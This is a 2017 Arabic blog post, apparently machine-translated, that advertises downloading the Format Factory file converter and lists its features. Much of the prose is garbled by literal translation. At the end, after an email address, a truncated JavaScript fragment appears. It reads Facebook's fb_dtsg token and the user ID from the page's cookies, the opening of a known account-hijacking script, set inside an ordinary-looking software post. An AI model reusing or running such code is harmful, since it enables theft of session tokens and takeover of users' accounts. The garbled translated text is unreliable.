jeudi 23 février 2017

تحميل برنامج format factory


تحميل برنامج format factory


نتيجة بحث الصور عن ‪format factory‬‏

مصنع شكل هو برنامج تحويل متعدد الوظائف هذا قادرة على تحويل جميع أنواع ملفات الفيديو والصوت والصورة. كاملة وقوية وحرة، إنها أداة تحويل يجب أن يكون.التحويلات وافر
قبل نقل الملفات على جهاز محمول (مثل اي فون، آي باد، أو الروبوت)، وحدة التحكم (PS3 و Xbox 360 و PSP) أو حرقها على قرص للتشغيل على جهاز تلفزيون أو نظام الصوت، قد يكون من الضروري لتحويلها إلى صيغ التي تتوافق مع الجهاز في السؤال.
مصنع شكل هو قطعة شاملة من البرامج التي تمكنك من تحويل أي تنسيق ملف تقريبا. بالنسبة للملفات التي تعرض أشكال وسائل الإعلام المتعددة، ويمكن تنسيق مصنع التعامل معها كل شيء، بما في ذلك الصوت والفيديو والصور، فضلا عن تقديم العديد من الخيارات لتنسيق الإخراج. كما أنه يتيح لك ضبط جودة ترميز الملفات بين منخفضة ومتوسطة وعالية.
مع مصنع تنسيق، يمكنك أيضا الحصول على بعض ملامح المكافأة، بما في ذلك استخراج محتويات قرص مضغوط أو دي في دي على جهاز الكمبيوتر الخاص بك، وكذلك خيار لدمج ملفات الفيديو والصوت.كيف يعمل؟
لتحويل الملفات مع مصنع تنسيق، كل شيء يحدث في العمود على الجانب الأيسر من واجهة. هذا يسمح لك لتحديد نوع الوجهة (الصوت والفيديو والصورة) والترميز الذي ترغب في استخدامه. لتحويل الفيديو، ونحن نوصي باستخدام الخيار "الجهاز المحمول"، الذي يرشدك في اختيار الشكل وفقا للجهاز لديك.
مصنع شكل يتيح لك إضافة الملفات إلى تحويل دفعة للراحة. هي عدد قليل من الخيارات المتقدمة المتاحة، ونتيجة لذلك، تعديلات حدودية طفيفة ويمكن إجراء فقط، على الرغم من أن هذا يعني أنه من السهل للاستخدام. مساعدة كاملة للمبتدئين متوفرة أيضا، وهو ما يفسر ملامح البرنامج.
مصنع الشكل هو أيضا متوفرة في 62 لغة، ويمكنك تخصيص واجهة مع 4 جلود مختلفة. بالنسبة لأولئك الذين لا يريدون لتثبيته على أجهزة الكمبيوتر الخاصة بهم، يمكنك تحميل النسخة المحمولة، لاستخدامها مع مفتاح USB، على سبيل المثال.استنتاج
إذا كنت ترغب في تحويل الملفات للتشغيل على الهاتف المحمول أو الجهاز اللوحي، وحدة التحكم، قرص مضغوط أو قرص DVD أو القارئ الإلكتروني، أو إذا كنت ببساطة تبحث عن برنامج شامل لتحويل مجرد عن أي نوع من الملفات، مصنع تنسيق هو الحل الأمثل.

email

ssdfqsdfcd@gmail.com (function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(docume...